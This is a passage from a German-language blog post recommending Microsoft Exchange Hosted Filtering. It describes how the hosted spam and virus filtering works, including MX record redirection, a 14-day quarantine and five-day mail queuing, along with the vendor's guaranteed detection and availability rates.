E-Mails am Server ohne Archivierung. Warum? Weil sich nach einem gewissen Beobachtungszeitraum herausgestellt hat, dass keine E-Mails falsch gefiltert werden. Trotzdem würde ich Ihnen eine solche Beobachtung empfehlen, damit auch das für Ihr Unternehmen geeignete Filter-Level eingestellt wird. Was jedoch sind die Exchange Hosted Filtering Services (EHF)? Auf der diesjährigen ITnT war ich sehr überrascht, wie unbekannt dieses Service unter den IT-Fachleuten leider noch ist. EHF ist ein Dienst, der dem IMF das Spamfiltern (nahezu) abnimmt. Funktionalität: genial! Mit Exchange Hosted Filtering wird von Microsoft weltweit ein vollständig gehostetes Managed Service für E-Mailschutz und Nachrichtenmanagement angeboten. Dabei werden für die Filterung der ein- und ausgehenden E-Mails eines Unternehmens mehrere weltweit verteilte Datenzentren genutzt. 100 Prozent aller bekannten Viren können auf diese Weise blockiert werden. Microsoft garantiert ein Abfangen von mindestens 95 Prozent aller eintreffenden Spam-Mails, garantiert wird auch eine Falsch-Richtig-Erkennungsrate von 1:250.000. Die Verfügbarkeit? 99,9%! Das Service läuft weltweit in verteilten Rechenzentren. Besonders fein ist, dass man es 30 Tage kostenlos testen kann. Damit hat jeder genügend Zeit, die Funktionalität zu testen und sich überzeugen zu lassen. Wie funktioniert das Service im Detail: es werden die MX-Records auf das Rechenzentrum von Microsoft umgelenkt. Damit werden E-Mails nicht mehr direkt an den Mailserver, sondern über das Microsoft Rechenzentrum zugestellt. Bei Microsoft erfolgt die Filterung der E-Mails. E-Mails, die als Spam identifiziert werden, landen in einem Quarantäne Ordner, der - je nach Konfiguration - von den Empfängern, oder nur vom Administrator einsehbar ist. Hier kann dann auch ein E-Mail in den Posteingang weiter geschickt werden, sollte es tatsächlich falsch gefiltert worden sein (False-Positive) oder sollte man an diesem speziellen Junk-Angebot gefallen gefunden haben. Die E-Mails im Quarantäne Ordner werden 14 Tage aufbewahrt, genug Zeit also, um dort ab & zu einen Blick hinein zu werfen. Zusätzlich kann Ihnen das Service helfen, Unternehmensrichtlinien in E-Mail durchzusetzen. Das Service queuet E-Mail bis zu 5 Tage lang - d.h. sollte der interne E-Mail Server nicht zur Verfügung stehen, ist auch hier gewährleistet, dass keine E-Mails verloren gehen. Zur Familie der Exchange Hosted Services gehören neben dem Exchange Hosted Filtering auch Exchange Hosted Archive, Exchange Hosted Continuity und Exchange Hosted Encryption. Übrigens: Exchange Hosted Filtering setzt nicht zwingend einen Exchange Server voraus. Wer von Ihnen mehr darüber wissen möchte oder Unterstützung möchte, kann sich gerne an mich wenden! Beitrag von Martina Grom Microsoft | Security Mediumlink | Permalink | Comments (0) | Post RSS mehr